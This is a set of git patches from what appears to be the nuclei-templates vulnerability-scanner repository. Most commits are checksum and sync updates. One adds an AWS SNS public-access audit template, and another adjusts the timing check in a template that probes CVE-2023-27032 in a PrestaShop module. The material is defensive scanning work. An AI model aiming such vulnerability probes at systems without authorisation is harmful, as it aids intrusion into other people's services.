http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-1380.yaml http/cves/2024/CVE-2024-21683.yaml From 95f846c857a715b20408dfafbab8039c9d001207 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 6 Jun 2024 12:50:17 +0000 Subject: [PATCH 718/847] Auto Generated Templates Checksum [Thu Jun 6 12:50:17 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 08f6131c0d..7601045196 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3078,6 +3078,7 @@ http/cves/2023/CVE-2023-34993.yaml:a3b0085c4446e25e6ef80234261084ccffc71e4b http/cves/2023/CVE-2023-35078.yaml:eb4b036b8f80137073704a8349d2343da6c69d3e http/cves/2023/CVE-2023-35082.yaml:1960a0ae8e9d496db2e08cb10e25229895f9f284 http/cves/2023/CVE-2023-35158.yaml:a4744cff56bc5b12153d1cc54b959bb290742e7f +http/cves/2023/CVE-2023-35162.yaml:b46ba765a58b31e06e13a1bdedd02f08f2454c22 http/cves/2023/CVE-2023-35813.yaml:aa0e5860ccecad4632ec6526f0f6b2732f91e4e8 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 http/cves/2023/CVE-2023-35844.yaml:3afe70bf8e3e05945e34c3f9b5b65fec8286f1f6 @@ -3829,7 +3830,7 @@ http/exposed-panels/extreme-netconfig-ui.yaml:c99540335fbd14e8a832200372e67e9f8a http/exposed-panels/extron-cms-panel.yaml:d8f4a5abd2e42f9b07e08f0ee95b2f6481803613 http/exposed-panels/ez-publish-panel.yaml:5160341394610803f417b5d8fda27da090e4d214 http/exposed-panels/f-secure-policy-manager.yaml:646c92e4390397cc7bf80e8bcd992a1043a95f6f -http/exposed-panels/f5-admin-interface.yaml:a64225dc87a41c6a3704338f1d1abbc28e2ef6df +http/exposed-panels/f5-admin-interface.yaml:18ae80d94afabe8082a63639be352e8646cf477f http/exposed-panels/faraday-login.yaml:c3b48df43eb116d0c1e264a181ca095685ef0e0b http/exposed-panels/fastapi-docs.yaml:74f9efd92e158f5b36c17eb1e45668c5fb0dafee http/exposed-panels/fastpanel-hosting-control-panel.yaml:c53b1d9ac66491f5b7e535f52111e85da99734c1 @@ -8630,7 +8631,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cb9993c4367096c439fe888572cd737763f5acda +templates-checksum.txt:beb8c364700585d36f0d924da2ffea1f340388c3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1d51f6a1330293d288c324e9384580910a0ec44c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 6 Jun 2024 12:51:12 +0000 Subject: [PATCH 719/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e1faa96144..c7a6c83ab9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2022/CVE-2022-34534.yaml' - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-3077.yaml' + - 'http/cves/2023/CVE-2023-35162.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-1380.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' From b90f7005bcd0c718aeecfc56dd84550622db9cfd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 6 Jun 2024 12:52:15 +0000 Subject: [PATCH 720/847] Auto Template Signing [Thu Jun 6 12:52:15 UTC 2024] :robot: --- http/cves/2023/CVE-2023-35162.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-35162.yaml b/http/cves/2023/CVE-2023-35162.yaml index f48f524f2f..efca725eec 100644 --- a/http/cves/2023/CVE-2023-35162.yaml +++ b/http/cves/2023/CVE-2023-35162.yaml @@ -42,3 +42,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022100c49efcd89e263ea211bc9119c0d6d1eefde0bac768f4f0ccd66179956dd375ca02204917b4bca2a8d825d234c1b1d8eceee9b76ea649133514614bfbde4411028efc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b7f0d8a53502c3b5cfae9831b3058ed15c9caacf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 6 Jun 2024 18:59:49 +0530 Subject: [PATCH 721/847] Update CVE-2023-27032.yaml --- http/cves/2023/CVE-2023-27032.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index 14e0905fdb..218853eb95 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -33,7 +33,7 @@ http: Host: {{Hostname}} - | - @timeout 10s + @timeout 20s POST /module/advancedpopupcreator/popup HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -43,7 +43,7 @@ http: matchers: - type: dsl dsl: - - duration>=6 + - duration_2>=6 - status_code == 200 - contains(content_type, "text/html") - contains_all(body, 'popups','hasError') @@ -63,4 +63,4 @@ http: regex: - ',"static_token":"([0-9a-z]+)",' internal: true -# digest: 4a0a00473045022100c8f4ed29d0095b7b570653f43172c909e18462ba144953cf4238d288cf0499ad02203b8e7489126202287ddad617939812b2ea43c464b639f7e41397993a0931643e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8f4ed29d0095b7b570653f43172c909e18462ba144953cf4238d288cf0499ad02203b8e7489126202287ddad617939812b2ea43c464b639f7e41397993a0931643e:922c64590222798bb761d5b6d8e72950 From 55d7b2f9556017e978f09da5c04e9724ef5d5775 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 6 Jun 2024 13:34:18 +0000 Subject: [PATCH 723/847] Auto Generated Templates Checksum [Thu Jun 6 13:34:18 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7601045196..4fd9bf9af2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2979,7 +2979,7 @@ http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 http/cves/2023/CVE-2023-26842.yaml:9ba42ef7713a2da2a394f4d7eb4a128b86fac335 http/cves/2023/CVE-2023-26843.yaml:8fe63e31bbec18e14832dc356cc39ad9fa68aac6 http/cves/2023/CVE-2023-27008.yaml:30ef0a8f111c80fd8db02f0bd82d93b872258169 -http/cves/2023/CVE-2023-27032.yaml:3adca243e329c892cace57bc3c2f5de4785e08b9 +http/cves/2023/CVE-2023-27032.yaml:6746a4b6a789d17fa9a6fbdbc7ee9aafc01f685c http/cves/2023/CVE-2023-27034.yaml:81fe9d019fa4529576ca3e6ce5723d93c9a08b44 http/cves/2023/CVE-2023-27159.yaml:cbef92bc5ef61d86ddd8f5621ef37267e63b0cef http/cves/2023/CVE-2023-27179.yaml:ad65cc149fce2fce2602528559e5ce2648f309e9 @@ -3078,7 +3078,7 @@ http/cves/2023/CVE-2023-34993.yaml:a3b0085c4446e25e6ef80234261084ccffc71e4b http/cves/2023/CVE-2023-35078.yaml:eb4b036b8f80137073704a8349d2343da6c69d3e http/cves/2023/CVE-2023-35082.yaml:1960a0ae8e9d496db2e08cb10e25229895f9f284 http/cves/2023/CVE-2023-35158.yaml:a4744cff56bc5b12153d1cc54b959bb290742e7f -http/cves/2023/CVE-2023-35162.yaml:b46ba765a58b31e06e13a1bdedd02f08f2454c22 +http/cves/2023/CVE-2023-35162.yaml:a1e9b6a500700fdc9ad4c23522c022e8ab9e0228 http/cves/2023/CVE-2023-35813.yaml:aa0e5860ccecad4632ec6526f0f6b2732f91e4e8 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 http/cves/2023/CVE-2023-35844.yaml:3afe70bf8e3e05945e34c3f9b5b65fec8286f1f6 @@ -8631,7 +8631,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:beb8c364700585d36f0d924da2ffea1f340388c3 +templates-checksum.txt:875b12ea7b9630f2ea859b6b861ed1c1d58c3c1a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ec4965d99fc1085f3f72b736910cc0ed670361f8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 6 Jun 2024 13:36:05 +0000 Subject: [PATCH 724/847] Auto Template Signing [Thu Jun 6 13:36:05 UTC 2024] :robot: --- http/cves/2023/CVE-2023-27032.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index 218853eb95..85a9e396e0 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -63,4 +63,4 @@ http: regex: - ',"static_token":"([0-9a-z]+)",' internal: true -# digest: 4a0a00473045022100c8f4ed29d0095b7b570653f43172c909e18462ba144953cf4238d288cf0499ad02203b8e7489126202287ddad617939812b2ea43c464b639f7e41397993a0931643e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022051c2c544aa88df5ef37dae2610144137829c101a6e858c333ba1a6976f1f5ad3022100d4fb2eea540be019a76aa5e82eead35f2adc71bff1d24e90d37795d563585ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 19772728309c40e44f0350f0dedd7b6e9e54ef9a Mon Sep 17 00:00:00 2001 From: Ritesh Gohil <riteshgohil.25@gmail.com> Date: Thu, 6 Jun 2024 11:51:18 -0400 Subject: [PATCH 725/847] Added SNS Topic access publicly Template --- sns_topic_public_accessible.yaml | 63 ++++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 sns_topic_public_accessible.yaml diff --git a/sns_topic_public_accessible.yaml b/sns_topic_public_accessible.yaml new file mode 100644 index 0000000000..4c5f16d447 --- /dev/null +++ b/sns_topic_public_accessible.yaml @@ -0,0 +1,63 @@ +id: sns-topic-policy-public-access + +info: + name: Public Access of SNS Topics via Policy + author: Ritesh_Gohil(#L4stPL4Y3R) + severity: critical + description: | + This template checks if Amazon SNS topics are configured to prevent public access via topic policies. + reference: + - https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html + tags: cloud, devops, aws, amazon, sns, aws-cloud-config + +flow: | + code(1) + for (let topicArn of iterate(template.topics)) { + set("topicArn", topicArn) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws sns list-topics --query 'Topics[*].TopicArn' + + extractors: + - type: json + internal: true + name: topics + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws sns get-topic-attributes --topic-arn $topicArn --query Attributes.Policy --output text + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Effect":"Allow"' + + - type: word + part: body + words: + - '"Principal":{"AWS":"*"}' + + - type: regex + part: body + negative: true + regex: + - '"Condition"' + + extractors: + - type: dsl + dsl: + - '"The SNS topic " + topicArn + " is publicly accessible via Policy"' +# digest: 4a0a0047304502200290e750e82d1e0766cede53f1ad65a1f9a04aaa4a4a36957a9f1072761cb25a0221009a7af53a7ee9887715e2c5791bab6885c0efaa7286ebc7731c40ccb5c5b14c8c:f37bf26b30a8e29c9db6a85589544950 From 44632fd516230d47e2fd970dac43fad20a29c4fc Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Thu, 6 Jun 2024 22:47:04 +0400 Subject: [PATCH 726/847] misc changes --- .../aws/sns/sns-topic-public-accessible.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename sns_topic_public_accessible.yaml => cloud/aws/sns/sns-topic-public-accessible.yaml (80%) diff --git a/sns_topic_public_accessible.yaml b/cloud/aws/sns/sns-topic-public-accessible.yaml similarity index 80% rename from sns_topic_public_accessible.yaml rename to cloud/aws/sns/sns-topic-public-accessible.yaml index 4c5f16d447..5cc304a527 100644 --- a/sns_topic_public_accessible.yaml +++ b/cloud/aws/sns/sns-topic-public-accessible.yaml @@ -1,14 +1,14 @@ -id: sns-topic-policy-public-access +id: sns-topic-public-accessible info: name: Public Access of SNS Topics via Policy author: Ritesh_Gohil(#L4stPL4Y3R) - severity: critical + severity: high description: | This template checks if Amazon SNS topics are configured to prevent public access via topic policies. reference: - https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html - tags: cloud, devops, aws, amazon, sns, aws-cloud-config + tags: cloud,devops,aws,amazon,sns,aws-cloud-config flow: | code(1) @@ -60,4 +60,4 @@ code: - type: dsl dsl: - '"The SNS topic " + topicArn + " is publicly accessible via Policy"' -# digest: 4a0a0047304502200290e750e82d1e0766cede53f1ad65a1f9a04aaa4a4a36957a9f1072761cb25a0221009a7af53a7ee9887715e2c5791bab6885c0efaa7286ebc7731c40ccb5c5b14c8c:f37bf26b30a8e29c9db6a85589544950 +# digest: 4a0a00473045022100a86cbadd9b2cca9f3e2eeb26bef158bf6658165af060938dc49ce7d588c776be0220179263c7d0129712f96ae3284cc2701c0407a1ca739ecf45729d656af36816d0:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file From 0519ba0161b1ea1b081533afbd5035863bd8f711 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 6 Jun 2024 18:51:54 +0000 Subject: [PATCH 727/847] Auto Generated New Template Addition List [Thu Jun 6 18:51:54 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0f2cebfdd0..1d1d596f6e 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cloud/aws/sns/sns-topic-public-accessible.yaml headless/webpack-sourcemap.yaml http/cnvd/2024/CNVD-2024-15077.yaml http/cves/2022/CVE-2022-0666.yaml From 92a408a4979c684e7d2d3cf1ba03518cab8516d3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 6 Jun 2024 18:52:06 +0000 Subject: [PATCH 728/847] Auto Generated Templates Checksum [Thu Jun 6 18:52:06 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4fd9bf9af2..d5a28f4808 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -88,6 +88,7 @@ cloud/aws/s3/s3-public-write-acp.yaml:3f2b36613d8008e1ac419f86a3986b6805958a39 cloud/aws/s3/s3-public-write.yaml:f437b7481168279f14d743f6fcec2b07388e894e cloud/aws/s3/s3-server-side-encryption.yaml:5ad53f21b9bd0f6429456de397a4ecf6b45f5e24 cloud/aws/s3/s3-versioning.yaml:bc4dadf7b83430d4f1d666bc0d61fff82bd0af1a +cloud/aws/sns/sns-topic-public-accessible.yaml:fc848d1ed7e11d8ff1b69c54af0909b8742b420c cloud/aws/vpc/nacl-open-inbound.yaml:4117d3d0d468f9b723f63cd36a964cd73f82e76f cloud/aws/vpc/nacl-outbound-restrict.yaml:dccc34edf2429e53bef902b6979e52418b415c14 cloud/aws/vpc/nat-gateway-usage.yaml:c292fbd2ca07a84b1c10d83cce119c2a024fb800 @@ -2979,7 +2980,7 @@ http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 http/cves/2023/CVE-2023-26842.yaml:9ba42ef7713a2da2a394f4d7eb4a128b86fac335 http/cves/2023/CVE-2023-26843.yaml:8fe63e31bbec18e14832dc356cc39ad9fa68aac6 http/cves/2023/CVE-2023-27008.yaml:30ef0a8f111c80fd8db02f0bd82d93b872258169 -http/cves/2023/CVE-2023-27032.yaml:6746a4b6a789d17fa9a6fbdbc7ee9aafc01f685c +http/cves/2023/CVE-2023-27032.yaml:ad4086ad222791bee07f60ac80d0cb7a95fa504f http/cves/2023/CVE-2023-27034.yaml:81fe9d019fa4529576ca3e6ce5723d93c9a08b44 http/cves/2023/CVE-2023-27159.yaml:cbef92bc5ef61d86ddd8f5621ef37267e63b0cef http/cves/2023/CVE-2023-27179.yaml:ad65cc149fce2fce2602528559e5ce2648f309e9 @@ -8631,7 +8632,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:875b12ea7b9630f2ea859b6b861ed1c1d58c3c1a +templates-checksum.txt:578be9174f52308e922dc6d7a70c78d854290af3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 262b4463006ba22d43b3424c29988db5c93d5ebe Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 6 Jun 2024 18:52:46 +0000 Subject: [PATCH 729/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c7a6c83ab9..a0f23f3d70 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'cloud/aws/sns/sns-topic-public-accessible.yaml' - 'headless/webpack-sourcemap.yaml' - 'http/cnvd/2024/CNVD-2024-15077.yaml' - 'http/cves/2022/CVE-2022-0666.yaml' From f559aeaeb96a0146ec17b31b7653ce400cd32faa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 7 Jun 2024 10:04:29 +0000 Subject: [PATCH 730/847] TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: --- cloud/aws/acm/acm-cert-renewal-30days.yaml | 3 +- cloud/aws/acm/acm-cert-renewal-45days.yaml | 3 +- cloud/aws/acm/acm-cert-validation.yaml | 3 +- cloud/aws/acm/acm-wildcard-cert.yaml | 3 +- cloud/aws/aws-code-env.yaml | 2 + .../cloudtrail/cloudtrail-data-events.yaml | 3 +- cloud/aws/cloudtrail/cloudtrail-disabled.yaml | 3 +- cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml | 3 +- .../cloudtrail-global-disabled.yaml | 3 +- .../cloudtrail-integrated-cloudwatch.yaml | 3 +- .../cloudtrail/cloudtrail-log-integrity.yaml | 3 +- .../cloudtrail-logs-not-encrypted.yaml | 3 +- .../aws/cloudtrail/cloudtrail-mfa-delete.yaml | 3 +- .../cloudtrail/cloudtrail-mgmt-events.yaml | 4 +- .../cloudtrail/cloudtrail-public-buckets.yaml | 3 +- .../cloudtrail-s3-bucket-logging.yaml | 3 +- .../s3-object-lock-not-enabled.yaml | 3 +- cloud/aws/cloudwatch/cw-alarm-action-set.yaml | 3 +- cloud/aws/cloudwatch/cw-alarms-actions.yaml | 3 +- cloud/aws/ec2/ec2-imdsv2.yaml | 4 +- cloud/aws/ec2/ec2-public-ip.yaml | 3 +- cloud/aws/ec2/ec2-sg-egress-open.yaml | 3 +- cloud/aws/ec2/ec2-sg-ingress.yaml | 3 +- cloud/aws/ec2/publicly-shared-ami.yaml | 3 +- cloud/aws/ec2/unencrypted-aws-ami.yaml | 3 +- cloud/aws/iam/iam-full-admin-privileges.yaml | 2 + cloud/aws/iam/iam-key-rotation-90days.yaml | 2 + cloud/aws/iam/iam-mfa-enable.yaml | 2 + cloud/aws/iam/iam-ssh-keys-rotation.yaml | 2 + cloud/aws/rds/aurora-copy-tags-snap.yaml | 3 +- cloud/aws/rds/aurora-delete-protect.yaml | 3 +- cloud/aws/rds/iam-db-auth.yaml | 3 +- cloud/aws/rds/rds-backup-enable.yaml | 3 +- cloud/aws/rds/rds-deletion-protection.yaml | 4 +- cloud/aws/rds/rds-encryption-check.yaml | 3 +- cloud/aws/rds/rds-gp-ssd-usage.yaml | 3 +- cloud/aws/rds/rds-public-snapshot.yaml | 3 +- cloud/aws/rds/rds-public-subnet.yaml | 3 +- cloud/aws/rds/rds-ri-payment-fail.yaml | 3 +- cloud/aws/rds/rds-snapshot-encryption.yaml | 3 +- cloud/aws/s3/s3-access-logging.yaml | 2 + cloud/aws/s3/s3-auth-fullcontrol.yaml | 2 + cloud/aws/s3/s3-bucket-key.yaml | 2 + .../s3/s3-bucket-policy-public-access.yaml | 2 + cloud/aws/s3/s3-mfa-delete-check.yaml | 2 + cloud/aws/s3/s3-public-read-acp.yaml | 2 + cloud/aws/s3/s3-public-read.yaml | 2 + cloud/aws/s3/s3-public-write-acp.yaml | 2 + cloud/aws/s3/s3-public-write.yaml | 2 + cloud/aws/s3/s3-server-side-encryption.yaml | 2 + cloud/aws/s3/s3-versioning.yaml | 2 + .../aws/sns/sns-topic-public-accessible.yaml | 2 + cloud/aws/vpc/nacl-open-inbound.yaml | 3 +- cloud/aws/vpc/nacl-outbound-restrict.yaml | 3 +- cloud/aws/vpc/nat-gateway-usage.yaml | 3 +- cloud/aws/vpc/unrestricted-admin-ports.yaml | 3 +- cloud/aws/vpc/vpc-endpoint-exposed.yaml | 3 +- cloud/aws/vpc/vpc-endpoints-not-deployed.yaml | 3 +- cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml | 3 +- cloud/aws/vpc/vpn-tunnel-down.yaml | 3 +- cloud/enum/azure-db-enum.yaml | 2 +- cloud/enum/azure-vm-cloud-enum.yaml | 2 +- code/cves/2019/CVE-2019-14287.yaml | 2 +- code/cves/2021/CVE-2021-3156.yaml | 2 +- code/cves/2023/CVE-2023-2640.yaml | 1 + code/cves/2023/CVE-2023-49105.yaml | 10 ++-- code/cves/2023/CVE-2023-4911.yaml | 2 +- code/cves/2023/CVE-2023-6246.yaml | 2 +- code/cves/2024/CVE-2024-3094.yaml | 2 +- .../linux/binary/privesc-sqlite3.yaml | 2 +- dast/cves/2018/CVE-2018-19518.yaml | 1 + dast/cves/2021/CVE-2021-45046.yaml | 1 + dast/cves/2022/CVE-2022-42889.yaml | 3 +- .../cmdi/blind-oast-polyglots.yaml | 6 ++- dast/vulnerabilities/cmdi/ruby-open-rce.yaml | 4 +- .../crlf/cookie-injection.yaml | 2 + dast/vulnerabilities/crlf/crlf-injection.yaml | 2 + dast/vulnerabilities/lfi/lfi-keyed.yaml | 2 + dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml | 2 + .../vulnerabilities/lfi/windows-lfi-fuzz.yaml | 2 + .../redirect/open-redirect.yaml | 2 + dast/vulnerabilities/rfi/generic-rfi.yaml | 2 + .../sqli/sqli-error-based.yaml | 2 + dast/vulnerabilities/ssrf/blind-ssrf.yaml | 2 + dast/vulnerabilities/ssrf/response-ssrf.yaml | 2 + .../vulnerabilities/ssti/reflection-ssti.yaml | 2 + dast/vulnerabilities/xss/reflected-xss.yaml | 2 + dast/vulnerabilities/xxe/generic-xxe.yaml | 2 + dns/bimi-detect.yaml | 21 +++++---- file/keys/credential-exposure-file.yaml | 2 +- headless/cves/2018/CVE-2018-25031.yaml | 5 +- headless/webpack-sourcemap.yaml | 5 +- http/cnvd/2017/CNVD-2017-06001.yaml | 7 ++- http/cnvd/2019/CNVD-2019-06255.yaml | 3 +- http/cves/2001/CVE-2001-0537.yaml | 5 +- http/cves/2002/CVE-2002-1131.yaml | 8 ++-- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 4 +- http/cves/2006/CVE-2006-2842.yaml | 4 +- http/cves/2007/CVE-2007-3010.yaml | 11 +++-- http/cves/2007/CVE-2007-5728.yaml | 9 ++-- http/cves/2008/CVE-2008-1061.yaml | 4 +- http/cves/2008/CVE-2008-1547.yaml | 10 +++- http/cves/2008/CVE-2008-5587.yaml | 5 +- http/cves/2008/CVE-2008-6465.yaml | 13 ++++-- http/cves/2008/CVE-2008-6982.yaml | 3 +- http/cves/2008/CVE-2008-7269.yaml | 4 +- http/cves/2009/CVE-2009-1151.yaml | 9 +++- http/cves/2009/CVE-2009-1496.yaml | 4 +- http/cves/2009/CVE-2009-1872.yaml | 10 +++- http/cves/2009/CVE-2009-4202.yaml | 5 +- http/cves/2009/CVE-2009-5114.yaml | 4 +- http/cves/2010/CVE-2010-0157.yaml | 5 +- http/cves/2010/CVE-2010-0219.yaml | 4 +- http/cves/2010/CVE-2010-0696.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 2 +- http/cves/2010/CVE-2010-0985.yaml | 3 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1352.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 5 +- http/cves/2010/CVE-2010-1470.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 3 +- http/cves/2010/CVE-2010-1531.yaml | 2 +- http/cves/2010/CVE-2010-1601.yaml | 2 +- http/cves/2010/CVE-2010-1603.yaml | 2 +- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 10 +++- http/cves/2010/CVE-2010-1875.yaml | 3 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 4 +- http/cves/2010/CVE-2010-2128.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 4 +- http/cves/2010/CVE-2010-2857.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 10 +++- http/cves/2010/CVE-2010-2920.yaml | 3 +- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2011/CVE-2011-1669.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 11 ++--- http/cves/2011/CVE-2011-4640.yaml | 8 +++- http/cves/2011/CVE-2011-4926.yaml | 4 +- http/cves/2011/CVE-2011-5107.yaml | 7 ++- http/cves/2011/CVE-2011-5179.yaml | 7 ++- http/cves/2011/CVE-2011-5181.yaml | 6 +-- http/cves/2011/CVE-2011-5265.yaml | 8 ++-- http/cves/2012/CVE-2012-0392.yaml | 10 +++- http/cves/2012/CVE-2012-0394.yaml | 11 ++++- http/cves/2012/CVE-2012-0901.yaml | 4 +- http/cves/2012/CVE-2012-0991.yaml | 11 ++++- http/cves/2012/CVE-2012-1835.yaml | 6 +-- http/cves/2012/CVE-2012-2371.yaml | 6 +-- http/cves/2012/CVE-2012-3153.yaml | 8 +++- http/cves/2012/CVE-2012-4032.yaml | 6 ++- http/cves/2012/CVE-2012-4242.yaml | 6 +-- http/cves/2012/CVE-2012-4253.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 6 +-- http/cves/2012/CVE-2012-4768.yaml | 8 ++-- http/cves/2012/CVE-2012-4940.yaml | 2 +- http/cves/2012/CVE-2012-5913.yaml | 6 +-- http/cves/2013/CVE-2013-1965.yaml | 10 +++- http/cves/2013/CVE-2013-2248.yaml | 10 +++- http/cves/2013/CVE-2013-2251.yaml | 10 +++- http/cves/2013/CVE-2013-2287.yaml | 6 +-- http/cves/2013/CVE-2013-3526.yaml | 4 +- http/cves/2013/CVE-2013-3827.yaml | 8 +++- http/cves/2013/CVE-2013-4117.yaml | 8 ++-- http/cves/2013/CVE-2013-4625.yaml | 6 +-- http/cves/2013/CVE-2013-7091.yaml | 12 +++-- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3704.yaml | 6 ++- http/cves/2014/CVE-2014-4210.yaml | 9 +++- http/cves/2014/CVE-2014-4513.yaml | 7 ++- http/cves/2014/CVE-2014-4535.yaml | 7 ++- http/cves/2014/CVE-2014-4536.yaml | 8 ++-- http/cves/2014/CVE-2014-4539.yaml | 4 +- http/cves/2014/CVE-2014-4544.yaml | 3 +- http/cves/2014/CVE-2014-4550.yaml | 5 +- http/cves/2014/CVE-2014-4558.yaml | 4 +- http/cves/2014/CVE-2014-4561.yaml | 6 +-- http/cves/2014/CVE-2014-4592.yaml | 2 +- http/cves/2014/CVE-2014-5368.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- 